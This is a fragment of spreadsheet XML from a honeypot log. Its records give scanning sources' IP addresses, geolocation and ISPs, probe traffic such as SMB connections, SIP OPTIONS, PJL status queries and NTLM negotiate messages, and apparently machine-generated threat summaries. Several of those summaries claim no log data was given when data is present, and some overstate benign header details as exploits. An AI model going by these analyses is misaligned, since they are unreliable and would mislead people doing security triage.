    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.147,60346)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.147;rport=56760'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.118.29:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.8.76:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.147;rport=47486'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.97.67:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 122.170.7.108:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.147;rport=54423'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '5.180.55.39:38241', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '5.180.55.39:38241', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8d93"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No activity detected for POP3 service, which is unusual as it's typically used by legitimate email clients. This may indicate an attempt to scan or probe the system. The absence of traffic suggests potential scanning or probing activities. &amp;&amp; An unknown host is attempting to access a generic web page on the server._x000a_The request is coming from an IP address that does not seem to be associated with legitimate traffic._x000a_This could indicate a scanning or probing attempt by a malicious actor. &amp;&amp; A GET request is being made to a server with an unusual IP address 5.180.55.39 and a non-standard port number 38241, suggesting potential malicious scanning activity. This could be a reconnaissance attempt by a botnet or an attacker trying to identify vulnerabilities. The use of the '*' wildcard in the Accept header may also indicate an attempt to exploit known vulnerabilities. &amp;&amp; An attacker is attempting to access the server using an unauthorized NTLM authentication attempt. The request is being made from a suspicious IP address and contains a User-Agent string that suggests a legitimate browser, but may be spoofed. The request is a GET method for the root directory '/'. &amp;&amp; A Windows-based system is attempting to access a service using an old NTLM authentication method, which may be a scan or brute-force attempt. The User-Agent string suggests a legitimate browser, but the combination with NTLM raises suspicion about its legitimacy. A potential malicious actor is probing for vulnerable services."/>
    <s v="No Login Attempt &amp;&amp; Port Scan &amp;&amp; Scanning GET &amp;&amp; NTLM Auth &amp;&amp; NTLM Auth Bypass"/>
  </r>
  <r>
    <x v="172"/>
    <x v="172"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:11:04"/>
    <d v="2024-09-10T17:58:00"/>
    <d v="2025-04-30T12:11:04"/>
    <n v="115"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445&amp;&amp;50082&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RN"/>
    <s v="Rio Grande do Norte"/>
    <s v="Parnamirim"/>
    <s v="Parnamirim"/>
    <s v="3392998"/>
    <s v="NA"/>
    <s v="-5.91556"/>
    <s v="-35.2628"/>
    <s v="267096"/>
    <s v="HELLO WEB TELECOMUNICACOES E SERVICOS LTDA"/>
    <s v="Hello Web Telecomunicacoes E Servicos Ltda"/>
    <s v="business"/>
    <s v="Hello Web Telecomunicacoes E Servicos Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,56620)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,57244)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,64773)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,64811)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,49323)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,49343)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,5252)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,5429)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,42790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,32696)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,32248)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,51184)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,50888)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,36259)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,36378)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,60031)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,34219)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,58244)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,14613)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (45.229.24.179,19854)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de5:18b3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Possible malicious activity is an incoming SMB connection from a suspicious IP address (45.229.24.179) to a system port (19854). This could be an attempt to access or exploit the system's shared resources. The source IP may be attempting unauthorized file sharing or access. &amp;&amp; A potential SMB connection attempt was made from IP address 45.229.24.179. This could be an unauthorized access attempt to the server's file shares or a malicious attack to spread malware through shared files. &amp;&amp; There is insufficient data to analyze possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="173"/>
    <x v="173"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:10:59"/>
    <d v="2023-12-06T01:10:00"/>
    <d v="2025-04-30T12:10:59"/>
    <n v="289"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;16847&amp;&amp;54078&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="CE"/>
    <s v="Ceará"/>
    <s v="Fortaleza"/>
    <s v="Fortaleza"/>
    <s v="3399415"/>
    <s v="60000-000"/>
    <s v="-3.73272"/>
    <s v="-38.527"/>
    <s v="4230"/>
    <s v="CLARO S.A."/>
    <s v="Claro S.A"/>
    <s v="business"/>
    <s v="Omega Distribuidora de Produtos Alimenticios Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,50335)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,50445)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,61783)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,61848)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,51784)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,51915)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,49674)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,49742)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,60153)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,60204)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,53983)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,54071)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,58684)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,59471)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,54390)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,54660)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (200.166.5.18,61352)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c8a6:512"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. _x000a__x000a_(Note: Please provide the actual log data for analysis) &amp;&amp; Insufficient data to analyze. The log shows no information about any malicious activity or service interactions. No notable events are recorded. &amp;&amp; Malicious activity detected, likely an attempt to exploit Microsoft SQL Server using MSSQL protocol. No actual malicious action was observed due to the honeypot's neutral response. The absence of &quot;Data_MSSQL&quot; value may indicate a probing or reconnaissance effort."/>
    <s v="I'm ready to analyze the log data when it's provided. Please go ahead and share the logs!"/>
  </r>
  <r>
    <x v="174"/>
    <x v="174"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:10:40"/>
    <d v="2024-02-06T06:38:00"/>
    <d v="2025-04-30T12:10:40"/>
    <n v="168"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;2627&amp;&amp;NA&amp;&amp;49587"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="06"/>
    <s v="Khuzestan"/>
    <s v="Shahrestān-e Bandar-e Māhshahr"/>
    <s v="Bandar-e Emam Khomeyni"/>
    <s v="8521444"/>
    <s v="NA"/>
    <s v="30.5542"/>
    <s v="49.0514"/>
    <s v="56503"/>
    <s v="PJSC Badr Rayan Jonoob"/>
    <s v="Badr-Rayan"/>
    <s v="business"/>
    <s v="PJSC Badr Rayan Jonoob"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,49658)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,49751)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,56707)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,58904)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,64963)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,65054)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,50880)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,51141)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,50051)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,50126)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,63602)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,63694)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,59709)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,59790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,57424)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,57550)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (91.106.95.98,59505)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5b6a:5f62"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unsuccessful SMB login attempt from unknown IP address 91.106.95.98, attempting to connect on port 59505. This may indicate a brute force attack or malicious scanning of the system's network resources. The target system is likely vulnerable to exploitation if weak credentials are used. &amp;&amp; A suspicious incoming connection has been detected from IP address 91.106.95.98 on port 59505, possibly indicating an attempt to exploit a vulnerability or gain unauthorized access. This could be a sign of malware propagation or a brute force attack against the SMB service. The IP address may be linked to malicious activity. &amp;&amp; No log data provided, unable to analyze. &amp;&amp; No log data provided, cannot determine malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="175"/>
    <x v="175"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:10:19"/>
    <d v="2024-04-16T10:32:41"/>
    <d v="2025-04-30T12:10:19"/>
    <n v="36"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_LDAP_H4&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_LDAP_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;61524&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="PH"/>
    <s v="Philippines"/>
    <s v="00"/>
    <s v="National Capital Region"/>
    <s v="Eastern Manila District"/>
    <s v="Mandaluyong"/>
    <s v="13118244"/>
    <s v="1550"/>
    <s v="14.5764"/>
    <s v="121.039"/>
    <s v="9299"/>
    <s v="Philippine Long Distance Telephone Co."/>
    <s v="Philippine Long Distance Telephone Co."/>
    <s v="residential"/>
    <s v="Philippine Long Distance Telephone Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7c6a:4376"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="176"/>
    <x v="176"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:05:45"/>
    <d v="2025-04-30T12:04:43"/>
    <d v="2025-04-30T12:05:45"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="12"/>
    <s v="Nonthaburi"/>
    <s v="Pak Kret"/>
    <s v="Pak Kret"/>
    <s v="1608048"/>
    <s v="11120"/>
    <s v="13.8995"/>
    <s v="100.543"/>
    <s v="45758"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="residential"/>
    <s v="Triple T Broadband Public Company Limited"/>
    <s v="2010-07-12"/>
    <s v="TTBP-TH"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfcf:f130"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="177"/>
    <x v="177"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T12:00:47"/>
    <d v="2023-07-24T19:23:43"/>
    <d v="2025-04-30T12:00:47"/>
    <n v="3740"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H40&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_HTTP_H25&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_NTP_H6&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_LDAP_H3&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5900&amp;&amp;80&amp;&amp;445&amp;&amp;123&amp;&amp;443&amp;&amp;389&amp;&amp;9100&amp;&amp;35220&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="67"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
